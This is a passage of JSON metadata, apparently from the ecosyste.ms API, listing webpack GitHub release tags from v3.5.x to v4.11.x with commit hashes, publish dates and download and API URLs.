s_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1/manifests"},{"name":"v4.11.0","sha":"e2fe2009d9f2b26a8d751ea89e184d6ec96e37d7","kind":"tag","published_at":"2018-06-05T11:25:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0/manifests"},{"name":"v4.10.2","sha":"b8266d09a9472344a4894f1d8cf4067eb452019c","kind":"tag","published_at":"2018-05-30T08:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2/manifests"},{"name":"v4.10.1","sha":"b80296f0c8b3907a8c96e4146bfb21746346fbb0","kind":"tag","published_at":"2018-05-29T13:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1/manifests"},{"name":"v4.10.0","sha":"ba703401d580ad623af17fe96ed98b4d801e0313","kind":"tag","published_at":"2018-05-28T23:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0/manifests"},{"name":"v4.9.2","sha":"317fb353518179c50342b1ac826d393a85b5903e","kind":"tag","published_at":"2018-05-28T20:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2/manifests"},{"name":"v4.9.1","sha":"94cd709b06ffc7071b3505a746f0bb17fb7e3c33","kind":"tag","published_at":"2018-05-25T21:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1/manifests"},{"name":"v4.9.0","sha":"bb0731d7897fb8a7369efd9d2f9bf0a8c08d546d","kind":"tag","published_at":"2018-05-25T20:17:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0/manifests"},{"name":"v4.8.3","sha":"9a72294918064d6b976538adf808808de948585f","kind":"tag","published_at":"2018-05-12T20:56:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3/manifests"},{"name":"v4.8.2","sha":"c92eabd3be44d4162be0affc9ef368624b0a6e51","kind":"tag","published_at":"2018-05-11T16:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2/manifests"},{"name":"v3.12.0","sha":"cce33c206abaeef26d06b62102adf74a989a4696","kind":"tag","published_at":"2018-05-11T14:50:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0/manifests"},{"name":"v4.8.1","sha":"2986ab1a18e895ac3f2546ac0c70bf73c0fdb679","kind":"tag","published_at":"2018-05-07T21:03:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1/manifests"},{"name":"v4.8.0","sha":"586f9a21768e8bbc6bead6e564a6c7981a42f2d8","kind":"tag","published_at":"2018-05-07T11:39:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0/manifests"},{"name":"v4.7.0","sha":"673c103715b5439bf72ed9767f5189b92ce7d428","kind":"tag","published_at":"2018-05-04T11:57:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0/manifests"},{"name":"v4.6.0","sha":"e7c8fa414b718ac98d94a96e2553faceabfbc92f","kind":"tag","published_at":"2018-04-17T16:23:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0/manifests"},{"name":"v4.5.0","sha":"e400445445a2f91d19aa8c79aa7b34b66011e661","kind":"tag","published_at":"2018-04-04T13:07:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0/manifests"},{"name":"v4.4.1","sha":"0e404b8683d79052e3a6b42743bd3061f17a5a5d","kind":"tag","published_at":"2018-03-29T15:28:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1/manifests"},{"name":"v4.4.0","sha":"e3bb8c9c8f5a30884b4df01bfbbc772cc1fb8cda","kind":"tag","published_at":"2018-03-29T14:57:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0/manifests"},{"name":"v4.3.0","sha":"54ceb3c04d513ef5c7b78eaf4d391d14cfbe8282","kind":"tag","published_at":"2018-03-27T09:00:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0/manifests"},{"name":"v4.2.0","sha":"d668a23fdc69c61ab80ec8db89a5b49778559534","kind":"tag","published_at":"2018-03-21T08:26:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0/manifests"},{"name":"v4.1.1","sha":"41bb63ad69d0f32c042e74e732cb045b5966c452","kind":"tag","published_at":"2018-03-07T15:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"f916fc0bb70585cf04a92cd99e004e4879f1d337","kind":"tag","published_at":"2018-03-04T10:39:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0/manifests"},{"name":"v4.0.1","sha":"5044762c846a3a83a208853e48785a293fe9ef7d","kind":"tag","published_at":"2018-02-26T20:11:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"213226ece261a0e89edb9de15fbc6775418f6041","kind":"tag","published_at":"2018-02-25T02:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0/manifests"},{"name":"v4.0.0-beta.3","sha":"4c25bfbaf2e01cf23708a381319b43367701e5b5","kind":"tag","published_at":"2018-02-24T14:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3/manifests"},{"name":"v4.0.0-beta.2","sha":"2ad530e4b486c248758f6d9d94070f207ef5f2e9","kind":"tag","published_at":"2018-02-17T13:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2/manifests"},{"name":"v3.11.0","sha":"bc840ec8747ba19c9e87629f2959ed2e65a9ffbe","kind":"tag","published_at":"2018-02-10T14:37:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0/manifests"},{"name":"v4.0.0-beta.1","sha":"df65475ba32a5881f48ab9d90e1c010ea57c3d65","kind":"tag","published_at":"2018-02-10T14:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1/manifests"},{"name":"v4.0.0-beta.0","sha":"ae0dc62b7b4cc1ee3170c8ce3dd581ddcfa46a2a","kind":"tag","published_at":"2018-01-24T22:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0/manifests"},{"name":"v4.0.0-alpha.5","sha":"c302bba6a53601dcab5e86dce5778897710c86e1","kind":"tag","published_at":"2018-01-22T14:19:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5/manifests"},{"name":"v4.0.0-alpha.4","sha":"37cc6f4f6ec178d0406dcf816de690cab9b1bf8f","kind":"tag","published_at":"2018-01-06T09:46:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4/manifests"},{"name":"v4.0.0-alpha.3","sha":"9334fd8547831ded7f11e05319616a72ea0b4698","kind":"tag","published_at":"2018-01-04T21:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3/manifests"},{"name":"v4.0.0-alpha.2","sha":"910d6fd40996189ee990fe90c69ab732cbd9963a","kind":"tag","published_at":"2017-12-22T11:49:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2/manifests"},{"name":"v4.0.0-alpha.1","sha":"9a33e031d16008d690a188a2d784666c8a293b43","kind":"tag","published_at":"2017-12-14T15:08:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1/manifests"},{"name":"v4.0.0-alpha.0","sha":"fd3c8025e5c32e625f68df2b030646a8c2a8467a","kind":"tag","published_at":"2017-12-04T19:52:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0/manifests"},{"name":"v3.10.0","sha":"c71fd05f98a752753b9450f590c970b76379803d","kind":"tag","published_at":"2017-12-04T18:02:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0/manifests"},{"name":"v3.9.1","sha":"5acbe2f72eaa67654904cf8a127c3ed4da12dc99","kind":"tag","published_at":"2017-11-30T17:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"73e34a7306d40ed95d666058ad03e9c14de554af","kind":"tag","published_at":"2017-11-30T13:53:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0/manifests"},{"name":"v3.8.1","sha":"b8e6b4a100a5d5a6387c276eb52d6c7f20954a0b","kind":"tag","published_at":"2017-10-17T15:20:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1/manifests"},{"name":"v3.8.0","sha":"1dc561865ad57d9e862832ccf3579f67a8bbba2d","kind":"tag","published_at":"2017-10-17T09:15:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0/manifests"},{"name":"v3.7.1","sha":"ce24e98bc084bf45a271fb05b14b0e9829686149","kind":"tag","published_at":"2017-10-11T19:39:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"551ea76838f163a1e0fbf65182e2ac08d346a1f3","kind":"tag","published_at":"2017-10-11T18:07:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0/manifests"},{"name":"v3.6.0","sha":"622675993d72c6ea7d70cd2e503fd9416f940b2b","kind":"tag","published_at":"2017-09-15T08:45:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0/manifests"},{"name":"v3.5.6","sha":"92d5c209437f9ef9293571e24cc8dcf10459d578","kind":"tag","published_at":"2017-09-06T15:41:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.6","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6/manifests"},{"name":"v3.5.5","sha":"ef6ab6820a74db730cfec6fd419d2c211d62c0bd","kind":"tag","published_at":"2017-08-16T14:55:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.5","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5/manifests"},{"name":"v3.5.4","sha":"990563f9a2b3fb3e817b7e1b9d6841bcd1eaa51e","kind":"tag","published_at":"2017-08-12T09:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.4","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4/manifests"},{"name":"v3.5.3","sha":"4b2b1ad99b86458983714c589c6495772b1292ee","kind":"tag","published_at":"2017-08-10T13:38:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"25302e51a601b4e30a661d788471e4a50b7a9764","kind":"tag","p